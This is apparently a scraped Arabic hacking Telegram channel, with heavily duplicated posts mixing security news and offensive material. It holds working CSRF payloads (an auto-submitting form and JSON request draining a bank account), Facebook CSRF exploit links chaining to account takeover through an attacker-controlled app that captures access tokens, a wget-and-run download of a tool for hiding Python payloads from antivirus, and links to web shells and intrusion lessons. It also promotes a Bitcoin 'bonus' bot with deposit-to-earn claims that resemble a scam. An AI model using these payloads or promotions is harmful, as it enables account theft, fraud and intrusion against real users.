Cross-Site Request Forgery
CSRF
أو تسمى أحياناً
XSRF
Cross-Site Reference Forgery
Session Riding
Hostile Linking
Sea Surf
هو نوع من الهجمات التي تنفذ من ناحية العميل Client-Side attack والتي تسمح بإرسال طلبات محددة إلى السيرفر من جهاز العميل .. وذلك عن طريق دفعه إلى الضغط على رابط محدد ( عن طريق الهندسة الاجتماعية ) .. هذا الرابط مصمم بطريقة تسمح بإرسال طلب من جهاز الضحية .. مثال:
لنفرض أن لدينا موقع بنك مثلاً .. ولنفرض أن mark لديه حساب وأراد تحويل رصيد إلى حساب john .. عند تحديد الرصيد الذي يريد إرساله (100$) واسم الحساب الذي يريد التحويل إليه john وضغط زر التحويل لاحظ أن الرابط أصبح
هناك عدة أنواع لهجمة CSRF :
أولاً عن طريق طلبات GET وهي التي تحدثنا عنها الآن .. مثلاً
#ProjectSigmaTeam
CSRF
أو تسمى أحياناً
XSRF
Cross-Site Reference Forgery
Session Riding
Hostile Linking
Sea Surf
هو نوع من الهجمات التي تنفذ من ناحية العميل Client-Side attack والتي تسمح بإرسال طلبات محددة إلى السيرفر من جهاز العميل .. وذلك عن طريق دفعه إلى الضغط على رابط محدد ( عن طريق الهندسة الاجتماعية ) .. هذا الرابط مصمم بطريقة تسمح بإرسال طلب من جهاز الضحية .. مثال:
لنفرض أن لدينا موقع بنك مثلاً .. ولنفرض أن mark لديه حساب وأراد تحويل رصيد إلى حساب john .. عند تحديد الرصيد الذي يريد إرساله (100$) واسم الحساب الذي يريد التحويل إليه john وضغط زر التحويل لاحظ أن الرابط أصبح
http://bank.com/transfer.php?to=john&amount=100
الآن إذا قام بتعديل الرابط إلى http://bank.com/transfer.php?to=mark&amount=100000
وإرسال الرابط إلى john وإقناعه بالضغط عليه .. سيتم تحويل 100 ألف دولار إلى رصيد mark من حساب john .. وهذا مبدأ الهجوم .. حيث أن موقع البنك لن يعرف إذا كان هذا الطلب حقيقياً أو مزوراً لأن الطلب تم إرساله بشكل طبيعي من الجهاز والكوكيز نفسها موجودة في الطلب ( لأن الضحية كان قد سجل الدخول إلى الموقع مسبقاً )هناك عدة أنواع لهجمة CSRF :
أولاً عن طريق طلبات GET وهي التي تحدثنا عنها الآن .. مثلاً
http://bank.com/transfer.php?to=attacker_account&amount=100000
ثانياً عن طريق طلبات POST مثل<body onload='document.forms[0].submit()'>
<form action='http://bank.com/transfer.php' method='POST'>
<input type='hidden' name='to' value='mark'>
<input type='hidden' name='amount' value='100000'>
<input type='submit' value='click this button to win something ....'>
</form>
أو عن طريق الJSON<body onload="send_req()">
<script language='javascript'>
function send_req() {
var x = new XMLHttpRequest();
x.open("PUT","http://bank.com/transfer.php",true);
x.setRequestHeader("Content-Type", "application/json");
x.send(JSON.stringify({"to":"mark", "amount":100000}));
}
</script>
الآن يمكننا وضع أحد الأكواد السابقة في صفحة وإرسال الرابط إلى الضحية وإقناعه بالضغط عليه .. فبمجرد الضغط عليه سيتم إرسال الطلب إلى السيرفر وسيتم تحويل الرصيد .. يمكن مثلاً استخدام هذه الطريقة لتغيير البريد الالكتروني للحساب ومن ثم اختراق حساب الضحية إذا كان مستخدماً عادياً ... أما إذا كان من إدارة الموقع فيمكن اختراق الموقع بأكمله#ProjectSigmaTeam
Forwarded from Project Sigma - Cyber Security From Zero
البوت الأول
تم السحب بنجاح 👍
والبوت صادق 100% صورة إثبات السحب في الأسفل
رابط البوت
http://t.me/BitcoinAntPoolbot?start=774282935
طريقة العمل وسحب الربح :
كل ما عليك فعله هو الدخول إلى البوت وضغط Bonus كل 24 ساعة لتحصل على ما يقارب 1000 إلى 3000 ساتوشي satoshi .. الساتوشي هو نوع من العملات حيث كل 50000 ساتوشي تساوي 0.0005 بيتكوين
وكل 1 بيتكوين يساوي تقريباً 4000 دولار ! وهو يزداد كل يوم
إذاً كل ما عليك فعله هو جمع الرصيد كل يوم وعند الوصول إلى الحد الأدنى للسحب ( وهو 50000 ساتوشي ) يمكنك تحويل الرصيد
لتحويل الرصيد تحتاج إلى محفظة wallet لتحويل الرصيد إليها والقيام بعمليات الدفع منها .. أشهر محفظة هي موقع blockchain ولكن الأسهل هو تطبيق bitpie للأندرويد .. قم بتحميله من أي متجر
بعد التحميل والدخول سيعطيك قائمة من 9 كلمات و9 فراغات .. اكتب الكلمات في هذه الفراغات ( هذه الكلمات هي بمثابة كلمة سر للدخول لحسابك .. اكتبها على ورقة واحتفظ بها فبدونها لن تتمكن من الدخول لحسابك لاحقاً ) ثم بعدها سيطلب تحديد رمز للدخول للتطبيق ..
لتحويل الرصيد إليها تحتاج إلى عنوان المحفظة .. يمكنك الحصول عليه بضغط receive وسيظهر العنوان بهذا الشكل
gFXGfXrodaXksXjpdXdlvn
تقريباً .. اضغط عليه للنسخ وأرسله للبوت ليقوم بتحويل الرصيد إليه
يمكنك لاحقاً القيام بdesposit أي تحويل رصيد للبوت لتسريع جمع الرصيد .. فعند تحويل 0.001 بيتكوين إلى البوت سيزداد الرصيد اليومي الذي تحصل عليه بمقدار 10%
#NullByteStream_team
تم السحب بنجاح 👍
والبوت صادق 100% صورة إثبات السحب في الأسفل
رابط البوت
http://t.me/BitcoinAntPoolbot?start=774282935
طريقة العمل وسحب الربح :
كل ما عليك فعله هو الدخول إلى البوت وضغط Bonus كل 24 ساعة لتحصل على ما يقارب 1000 إلى 3000 ساتوشي satoshi .. الساتوشي هو نوع من العملات حيث كل 50000 ساتوشي تساوي 0.0005 بيتكوين
وكل 1 بيتكوين يساوي تقريباً 4000 دولار ! وهو يزداد كل يوم
إذاً كل ما عليك فعله هو جمع الرصيد كل يوم وعند الوصول إلى الحد الأدنى للسحب ( وهو 50000 ساتوشي ) يمكنك تحويل الرصيد
لتحويل الرصيد تحتاج إلى محفظة wallet لتحويل الرصيد إليها والقيام بعمليات الدفع منها .. أشهر محفظة هي موقع blockchain ولكن الأسهل هو تطبيق bitpie للأندرويد .. قم بتحميله من أي متجر
بعد التحميل والدخول سيعطيك قائمة من 9 كلمات و9 فراغات .. اكتب الكلمات في هذه الفراغات ( هذه الكلمات هي بمثابة كلمة سر للدخول لحسابك .. اكتبها على ورقة واحتفظ بها فبدونها لن تتمكن من الدخول لحسابك لاحقاً ) ثم بعدها سيطلب تحديد رمز للدخول للتطبيق ..
لتحويل الرصيد إليها تحتاج إلى عنوان المحفظة .. يمكنك الحصول عليه بضغط receive وسيظهر العنوان بهذا الشكل
gFXGfXrodaXksXjpdXdlvn
تقريباً .. اضغط عليه للنسخ وأرسله للبوت ليقوم بتحويل الرصيد إليه
يمكنك لاحقاً القيام بdesposit أي تحويل رصيد للبوت لتسريع جمع الرصيد .. فعند تحويل 0.001 بيتكوين إلى البوت سيزداد الرصيد اليومي الذي تحصل عليه بمقدار 10%
#NullByteStream_team
Forwarded from Project Sigma - Cyber Security From Zero
صورة إثبات السحب 👆
رابط الإثبات على blockchain
https://www.blockchain.com/btc/tx/50a71274079feae39e66febad054ddc738fe2ee42d897906468399ed4d4e3131
رابط الإثبات على blockchain
https://www.blockchain.com/btc/tx/50a71274079feae39e66febad054ddc738fe2ee42d897906468399ed4d4e3131
Forwarded from Project Sigma
تم إنشاء موقع للفريق وسنتابع شرح الدروس عليه لسهولة وضع الصور والأكواد ضمن الشرح ولأن بعض الدروس طويلة جداً ومن الصعب نشرها على القناة مباشرةً
بالطبع سأضع رابط كل درس على القناة 👍🏻
رابط الموقع
http://nullbytestream.tk
بالطبع سأضع رابط كل درس على القناة 👍🏻
رابط الموقع
http://nullbytestream.tk
#اختراق_شبكات_الوايفاي
#الدرس_الثاني
الطريقة الاحترافية لاختراق أي شبكة واي فاي .. باستخدام أداة aircrack-ng
الشرح على نظام الكالي لينوكس .. يعمل على أي نظام لينوكس وقد يعمل على التيرمكس حسب الجهاز
رابط الشرح
https://dwindly.io/nLKxmX
بعد الدخول إلى الرابط اضغط continue وانتظر 5 ثواني ثم اضغط get link
#NullByteStream_team
#الدرس_الثاني
الطريقة الاحترافية لاختراق أي شبكة واي فاي .. باستخدام أداة aircrack-ng
الشرح على نظام الكالي لينوكس .. يعمل على أي نظام لينوكس وقد يعمل على التيرمكس حسب الجهاز
رابط الشرح
https://dwindly.io/nLKxmX
بعد الدخول إلى الرابط اضغط continue وانتظر 5 ثواني ثم اضغط get link
#NullByteStream_team
ثغرة Privilege escalation في خدمة systemd تصيب عدد كبير من الأنظمة التي تعتمد على هذه الخدمة ... من ضمنها debian و Redhat... هذه الثغرة تم كشفها منذ شهر تقريباً وهي موجودة بالضبط ضمن systemd-journald ... هذه الخدمة تقوم بجمع معلومات من مختلف المصادر وتخزنها على شكل logs
الCVE :
CVE-2018-16864
CVE-2018-16865
CVE-2018-16866
#NullByteStream_team
الCVE :
CVE-2018-16864
CVE-2018-16865
CVE-2018-16866
#NullByteStream_team
29 تطبيق كاميرا للأندرويد تم كشفها بأنها تقوم بسرقة الصور الشخصية للمستخدمين !!
العديد من التطبيقات المشهورة لالتقاط وتعديل وتجميل الصور الشخصية تم كشف كود خبيث فيها يقوم بإرسال الصور الملتقطة إلى سيرفر خاص بمصمم البرنامج .. هذه التطبيقات بعد كشفها تم حذفها من متجر غوغل بلاي
قائمة التطبيقات في الأسفل 👇
لذلك فإن وجود البرنامج على متجر غوغل بلاي لا يعني أنه آمن وموثوق .. لذلك احذر عند التعامل مع أي برنامج .. وثبت مضاد فيروسات جيد للحماية من مثل هذه البرامج
العديد من التطبيقات المشهورة لالتقاط وتعديل وتجميل الصور الشخصية تم كشف كود خبيث فيها يقوم بإرسال الصور الملتقطة إلى سيرفر خاص بمصمم البرنامج .. هذه التطبيقات بعد كشفها تم حذفها من متجر غوغل بلاي
قائمة التطبيقات في الأسفل 👇
لذلك فإن وجود البرنامج على متجر غوغل بلاي لا يعني أنه آمن وموثوق .. لذلك احذر عند التعامل مع أي برنامج .. وثبت مضاد فيروسات جيد للحماية من مثل هذه البرامج
ما زال نظام الأندرويد يتعرض لانتكاسات أمنية خطيرة
مع اكتشاف ثغرة أمنية تسمح باختراق جهاز أندرويد عن طريق صورة !!!
شركة غوغل تقوم بترقيع 3 ثغرات أمنية خطيرة تسمح بتنفيذ أوامر خارجية على أجهزة الأندرويد عن طريق صورة PNG
الإصدارات المصابة من نظام الأندرويد هي من 7 ( Nougat ) إلى 9 ( Pie )
الCVEs :
CVE-2019-1986
CVE-2019-1987
CVE-2019-1988
#NullByteStream_team
مع اكتشاف ثغرة أمنية تسمح باختراق جهاز أندرويد عن طريق صورة !!!
شركة غوغل تقوم بترقيع 3 ثغرات أمنية خطيرة تسمح بتنفيذ أوامر خارجية على أجهزة الأندرويد عن طريق صورة PNG
الإصدارات المصابة من نظام الأندرويد هي من 7 ( Nougat ) إلى 9 ( Pie )
الCVEs :
CVE-2019-1986
CVE-2019-1987
CVE-2019-1988
#NullByteStream_team
Quick Script Encryption Tool - V1.0
أداة تشفير سكريبتات البايثون ( من تصميمي ) لتشفير بايلودات البايثون وإخفائها عن برامج الحماية بشكل كامل
أو لحماية برنامجك من التعديل بسهولة
الأداة تدعم التشفير عدة مرات لنفس الملف لجعل فكه أصعب
أوامر التحميل
الأداة تحتاج مترجم البايثون الإصدار الثاني .. إذا واجهت مشكلة في تشغيلها اكتب الأمر
بعد تشغيلها أدخل مسار الملف ثم أدخل عدد مرات التشفير ( الافتراضي 5 ) بعد الانتهاء ستقوم الأداة بعرض مسار الملف المشفر
#NullByteStream_team
أداة تشفير سكريبتات البايثون ( من تصميمي ) لتشفير بايلودات البايثون وإخفائها عن برامج الحماية بشكل كامل
أو لحماية برنامجك من التعديل بسهولة
الأداة تدعم التشفير عدة مرات لنفس الملف لجعل فكه أصعب
أوامر التحميل
wget http://nullbytestream.tk/files/quick_encryption_tool.py
chmod 777 quick_encryption_tool.py
python2 quick_encryption_tool.py
الأداة تحتاج مترجم البايثون الإصدار الثاني .. إذا واجهت مشكلة في تشغيلها اكتب الأمر
apt-get install python2
بعد تشغيلها أدخل مسار الملف ثم أدخل عدد مرات التشفير ( الافتراضي 5 ) بعد الانتهاء ستقوم الأداة بعرض مسار الملف المشفر
#NullByteStream_team
Forwarded from Project Sigma (ÃŕMąŃđÒ)
يسمح بنشر أي شرح من شروحاتي على أي قناة أخرى ولكن عن طريق إعادة التوجيه أو بذكر رابط القناة فقط
رابط القناة التي نقلت الشرح منها
#ArMaNdO
رابط القناة التي نقلت الشرح منها
#ArMaNdO
ShellShock
ثغرة Remote Code Execution في بيئة Bash
السبب - الاستغلال
رابط الشرح
http://nullbytestream.tk/articles.php?id=851954730227589632
#NullByteStream_team
ثغرة Remote Code Execution في بيئة Bash
السبب - الاستغلال
رابط الشرح
http://nullbytestream.tk/articles.php?id=851954730227589632
#NullByteStream_team
Quick Script Encryption Tool - v1.0
تم إطلاق النسخة الخاصة بنظام الويندوز .. رابط التحميل
http://nullbytestream.tk/files/Quick_Script_Encryption_Tool_1.0.zip
#NullByteStream_team
تم إطلاق النسخة الخاصة بنظام الويندوز .. رابط التحميل
http://nullbytestream.tk/files/Quick_Script_Encryption_Tool_1.0.zip
#NullByteStream_team
ثغرة Cross-Site Request Forgery ( من اكتشافي ) في سكريبت YOT CMS
الثغرة تسمح بتغيير معلومات الحساب ( اسم المستخدم - كلمة السر ..... ) الخاصة بالمستخدمين أو إدارة الموقع .. عن طريق تنفيذ هجمة من ناحية العميل Client-Side بطلب POST
لمزيد من التفاصيل وطريقة الاستغلال
https://cxsecurity.com/issue/WLB-2019020105
الثغرة تسمح بتغيير معلومات الحساب ( اسم المستخدم - كلمة السر ..... ) الخاصة بالمستخدمين أو إدارة الموقع .. عن طريق تنفيذ هجمة من ناحية العميل Client-Side بطلب POST
لمزيد من التفاصيل وطريقة الاستغلال
https://cxsecurity.com/issue/WLB-2019020105
Cxsecurity
YOT CMS Cross-Site Request Forgery - user profile changing - CXSecurity.com
ÃŕMąŃđÒ has realised a new security note YOT CMS Cross-Site Request Forgery - user profile changing
نوع جديد من البرامج الخبيثة في أجهزة الأندرويد تسرق العملات الرقمية !
باحث أمني في شركة ESET يكتشف نوع من البرامج الخبيثة أطلق عليه clipper والذي يسرق عملات البيتكوين وغيرها بطريقة غريبة
هذا البرنامج يصل إلى الحافظة clipboard ويقوم بتعديل عناوين المحفظة ( wallet address ) إلى عنوان الهاكر مصممه
لأن جميع محافظ العملات الرقمية تكون عناوينها طويلة لذلك يلجأ الجميع إلى استخدام النسخ واللصق لكتابتها
وبتغيير العنوان في الحافظة سيقوم الشخص بلصق العنوان البديل بدلاً من عنوان محفظته ويقوم بتحويل الرصيد إليه
البرنامج المصاب موجود على متجر غوغل بلاي باسم "MetaMask" وهو بالأساس إضافة لمتصفح كروم وفايرفوكس وغيرها ..
#NullByteStream_team
باحث أمني في شركة ESET يكتشف نوع من البرامج الخبيثة أطلق عليه clipper والذي يسرق عملات البيتكوين وغيرها بطريقة غريبة
هذا البرنامج يصل إلى الحافظة clipboard ويقوم بتعديل عناوين المحفظة ( wallet address ) إلى عنوان الهاكر مصممه
لأن جميع محافظ العملات الرقمية تكون عناوينها طويلة لذلك يلجأ الجميع إلى استخدام النسخ واللصق لكتابتها
وبتغيير العنوان في الحافظة سيقوم الشخص بلصق العنوان البديل بدلاً من عنوان محفظته ويقوم بتحويل الرصيد إليه
البرنامج المصاب موجود على متجر غوغل بلاي باسم "MetaMask" وهو بالأساس إضافة لمتصفح كروم وفايرفوكس وغيرها ..
#NullByteStream_team
Forwarded from Project Sigma - Cyber Security From Zero (ÃŕMąŃđÒ)
#اختراق_الأجهزة
#الدرس_الثاني
- اختراق الأجهزة البعيدة عبر شبكة الانترنت باستخدام بايلودات الميتاسبلويت Metasploit
- أفضل بديل لأداة ngrok
رابط الشرح
http://nullbytestream.tk/articles.php?id=256860720925033088
#NullByteStream_team
#الدرس_الثاني
- اختراق الأجهزة البعيدة عبر شبكة الانترنت باستخدام بايلودات الميتاسبلويت Metasploit
- أفضل بديل لأداة ngrok
رابط الشرح
http://nullbytestream.tk/articles.php?id=256860720925033088
#NullByteStream_team
كيف يمكنك اختراق حساب فيسبوك ؟
كل ما عليك فعله هو إرسال رابط إلى الضحية ليتم تغيير معلومات حسابه أو حذفه بكبسة زر !
ثغرة CSRF خطيرة في موقع فيسبوك من اكتشاف الباحث الأمني "Samm0uda" الذي وجد طريقة لتخطي حماية CSRF وتنفيذ الهجمة
وبحسب المقال الذي نشره كل ما يتطلبه الأمر هو الضغط على رابط من قبل الضحية ليتم النشر على يومياته أو حذف أو تغيير صورة الملف الشخصي أو حتى حذف الحساب .. كما يمكن إضافة بريد الكتروني جديد إلى الحساب وبهذه الطريقة يمكن إعادة تعيين كلمة السر والدخول إليه
تم منح مكافأة 25,000$ لهذا الباحث كجزء من برنامج المكافآت للكشف عن الثغرات bug bounty program
#NullByteStream_team
كل ما عليك فعله هو إرسال رابط إلى الضحية ليتم تغيير معلومات حسابه أو حذفه بكبسة زر !
ثغرة CSRF خطيرة في موقع فيسبوك من اكتشاف الباحث الأمني "Samm0uda" الذي وجد طريقة لتخطي حماية CSRF وتنفيذ الهجمة
وبحسب المقال الذي نشره كل ما يتطلبه الأمر هو الضغط على رابط من قبل الضحية ليتم النشر على يومياته أو حذف أو تغيير صورة الملف الشخصي أو حتى حذف الحساب .. كما يمكن إضافة بريد الكتروني جديد إلى الحساب وبهذه الطريقة يمكن إعادة تعيين كلمة السر والدخول إليه
تم منح مكافأة 25,000$ لهذا الباحث كجزء من برنامج المكافآت للكشف عن الثغرات bug bounty program
#NullByteStream_team
استغلال الثغرة :
نشر منشور على اليوميات :
حذف صورة الملف الشخصي :
خداع المستخدم لحذف الحساب ( بعد تغيير اللغة ضمن البارامتر local ) :
أما بالنسبة لإضافة بريد الكتروني جديد فهي أصعب قليلاً لأنها تعتمد على إعادة توجيه إلى الموقع الخاص بك مع رابط يحوي التوكن Access_token
المرحلة الأولى :
هنا ستعين رابط موقعك لتتم إعادة التوجيه إليه مع التوكن
المرحلة الثانية :
سيقوم الموقع بتعيين بريد الكتروني جديد ثم إعادة توجيه الطلب إلى فيسبوك
هنا تم تغيير البريد الالكتروني .. قم بالدخول إلى البريد الجديد وتأكيد الحساب :
حيث code و hash ستصل ضمن بريد التأكيد
المرحلة الأخيرة : إعادة تعيين كلمة السر - عن طريق البريد الالكتروني الجديد -
بالطبع يجب تعديل المتغيرات في الروابط بالأعلى
#ArMaNdO
#NullByteStream_team
نشر منشور على اليوميات :
https://www.facebook.com/comet/dialog_DONOTUSE/?url=
/api/graphql/%3fdoc_id=
1740513229408093%26variables={"input":{"actor_id":{TARGET_ID},"client_mutation_id":"1","source":"WWW","audience":{"web_privacyx":"REDECATED"},"message":{"text":"TEXT","ranges":[]}}}
حذف صورة الملف الشخصي :
https://www.facebook.com/comet/dialog_DONOTUSE/?
url=/profile/picture/remove_picture/%3fdelete_from_album=1%
26profile_id={TARGET_ID}
خداع المستخدم لحذف الحساب ( بعد تغيير اللغة ضمن البارامتر local ) :
https://www.facebook.com/comet/dialog_DONOTUSE/?
url=/help/delete_account/dialog/%3f__asyncDialog=0%26locale=fr_FR
أما بالنسبة لإضافة بريد الكتروني جديد فهي أصعب قليلاً لأنها تعتمد على إعادة توجيه إلى الموقع الخاص بك مع رابط يحوي التوكن Access_token
المرحلة الأولى :
https://www.facebook.com/comet/dialog_DONOTUSE/?url=
/ajax/appcenter/redirect_to_app%3fapp_id={ATTACKER_APP}%26ref=
appcenter_top_grossing%26redirect_uri=https%3a//www.facebook.com/v3.2/dialog/oauth%3fresponse_type%3dtoken%26
client_id%3d{ATTACKER_APP}%26redirect_uri%3d{DOUBLE_URL_ENCODED_LINK}%26scope%3d&
preview=0&fbs=125&sentence_id&gift_game=0&scopes[0]=email&gdpv4_source=dialog
هنا ستعين رابط موقعك لتتم إعادة التوجيه إليه مع التوكن
المرحلة الثانية :
سيقوم الموقع بتعيين بريد الكتروني جديد ثم إعادة توجيه الطلب إلى فيسبوك
https://www.facebook.com/comet/
dialog_DONOTUSE/?
url=/add_contactpoint/dialog/submit/%3fcontactpoint={EMAIL_
CHOSEN}%26next=/v3.2/dialogoauth%253fresponse_type%253dtoken%2526client_id%253d{ATTACKER_APP}%2526redirect_uri%253d{DOUBLE_URL_ENCODED_LINK]
هنا تم تغيير البريد الالكتروني .. قم بالدخول إلى البريد الجديد وتأكيد الحساب :
https://www.facebook.com/
confirmcontact.php?c={CODE}&z=0&gfid={HASH}
حيث code و hash ستصل ضمن بريد التأكيد
المرحلة الأخيرة : إعادة تعيين كلمة السر - عن طريق البريد الالكتروني الجديد -
بالطبع يجب تعديل المتغيرات في الروابط بالأعلى
#ArMaNdO
#NullByteStream_team
Forwarded from Virtual]•[World]•[Kings منقول (Plus Ultra)
كورس الهكر الأخلاقي CEH v10 مع ملف للأدوات المستخدمة في اللاب
http://www.mediafire.com/file/2ibvzbjnw2cby11/CEH+v10.zip
ملف الأدوات
https://mega.nz/#F!8plEBKhZ
لفتح الملف : plxVgHXBag83AWMAUApQ9Q
#أمن_المعلومات
#Plus_Ultra
#shinory
#منقولة
المصدر @CyberSecurity101
@PM035
http://www.mediafire.com/file/2ibvzbjnw2cby11/CEH+v10.zip
ملف الأدوات
https://mega.nz/#F!8plEBKhZ
لفتح الملف : plxVgHXBag83AWMAUApQ9Q
#أمن_المعلومات
#Plus_Ultra
#shinory
#منقولة
المصدر @CyberSecurity101
@PM035
MediaFire
CEH v10
MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
Forwarded from Project Sigma - Cyber Security From Zero (ÃŕMąŃđÒ)
expoilt
موقع يحوي مجموعة من أقوى الشلات للتحميل
لرفعها على المواقع والتحكم بها
رابط الموقع
http://www.expoilt.com/
#NullByteStream_team
موقع يحوي مجموعة من أقوى الشلات للتحميل
لرفعها على المواقع والتحكم بها
رابط الموقع
http://www.expoilt.com/
#NullByteStream_team